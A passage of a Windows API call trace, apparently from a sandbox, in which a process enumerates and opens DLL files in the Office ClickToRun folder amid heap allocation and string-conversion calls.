ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0xefec0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ucrtbase.dll", cAlternateFileName="")) returned 1 [0081.829] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0081.829] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0081.829] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0081.829] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0081.829] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0081.829] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0081.830] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0081.830] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0081.830] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0081.830] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0081.830] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0081.830] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0081.830] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0081.830] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0081.830] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0081.830] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0081.830] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0081.830] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0081.830] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0081.830] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0081.830] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0081.830] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0081.830] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8abb8 [0081.830] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0081.830] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.830] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.830] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.830] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.830] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8abb8 | out: hHeap=0x20000) returned 1 [0081.830] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0081.830] AreFileApisANSI () returned 1 [0081.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ucrtbase.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ucrtbase.dll", lpUsedDefaultChar=0x0) returned 71 [0081.830] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0081.830] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.830] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.830] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0081.830] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0081.831] AreFileApisANSI () returned 1 [0081.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 71 [0081.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a660 [0081.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x8a660, cchWideChar=71 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ucrtbase.dll") returned 71 [0081.831] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ucrtbase.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\ucrtbase.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0081.831] GetFileType (hFile=0x430) returned 0x1 [0081.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0081.832] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0081.832] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0081.832] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0081.832] CloseHandle (hObject=0x430) returned 1 [0081.832] AreFileApisANSI () returned 1 [0081.832] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 71 [0081.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8ac50 [0081.832] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x8ac50, cchWideChar=71 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ucrtbase.dll") returned 71 [0081.832] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ucrtbase.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\ucrtbase.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0081.832] GetFileType (hFile=0x430) returned 0x1 [0081.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ac50 | out: hHeap=0x20000) returned 1 [0081.833] CloseHandle (hObject=0x430) returned 1 [0081.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0081.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0081.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0081.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0081.833] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0081.833] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0081.833] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0081.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0081.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0081.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0081.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0081.833] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0081.833] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0081.833] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0081.833] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0081.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0081.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0081.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0081.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0081.833] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0081.833] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0081.833] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0081.833] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0081.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0081.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0081.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0081.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0081.833] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0081.833] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0081.834] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0081.834] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0081.834] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0081.834] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0081.834] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0081.834] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0081.834] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0081.834] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0081.834] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0081.834] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0081.834] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0081.834] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0081.834] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0081.834] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0081.834] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0081.834] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0081.834] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0081.834] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0081.834] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0081.834] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0081.834] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0081.834] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0081.834] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0081.834] AreFileApisANSI () returned 1 [0081.834] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 71 [0081.834] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a368 [0081.834] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x8a368, cchWideChar=71 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ucrtbase.dll") returned 71 [0081.834] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ucrtbase.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\ucrtbase.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80d542e1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80d542e1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0xefec0)) returned 1 [0081.834] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0081.834] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0081.834] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0081.834] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0081.834] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.834] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.835] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80d7a486, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80d7a486, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x5f4b0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="vccorlib140.dll", cAlternateFileName="VCCORL~1.DLL")) returned 1 [0081.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0081.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0081.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0081.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0081.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0081.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0081.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0081.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0081.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0081.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0081.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0081.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0081.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0081.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0081.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0081.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0081.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0081.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0081.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0081.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0081.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0081.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0081.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0081.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0081.835] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.835] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.835] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.835] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0081.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0081.835] AreFileApisANSI () returned 1 [0081.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vccorlib140.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vccorlib140.dll", lpUsedDefaultChar=0x0) returned 74 [0081.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0081.835] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.836] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0081.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0081.836] AreFileApisANSI () returned 1 [0081.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0081.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x94) returned 0x85d00 [0081.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x85d00, cchWideChar=74 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vccorlib140.dll") returned 74 [0081.836] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vccorlib140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\vccorlib140.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0081.837] GetFileType (hFile=0x430) returned 0x1 [0081.837] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85d00 | out: hHeap=0x20000) returned 1 [0081.837] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0081.837] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0081.837] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0081.837] CloseHandle (hObject=0x430) returned 1 [0081.837] AreFileApisANSI () returned 1 [0081.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0081.837] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x94) returned 0x85580 [0081.838] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x85580, cchWideChar=74 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vccorlib140.dll") returned 74 [0081.838] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vccorlib140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\vccorlib140.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0081.838] GetFileType (hFile=0x430) returned 0x1 [0081.838] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85580 | out: hHeap=0x20000) returned 1 [0081.838] CloseHandle (hObject=0x430) returned 1 [0081.838] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0081.838] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0081.838] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0081.838] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0081.838] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0081.838] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0081.838] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0081.838] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0081.838] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0081.838] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0081.838] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0081.838] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0081.838] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0081.838] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0081.838] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0081.838] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0081.838] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0081.838] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0081.838] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0081.838] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0081.838] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0081.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0081.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0081.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0081.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0081.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0081.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0081.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0081.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0081.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0081.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0081.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0081.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0081.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0081.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0081.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0081.839] HeapFree (in: hHeap=0x20000, 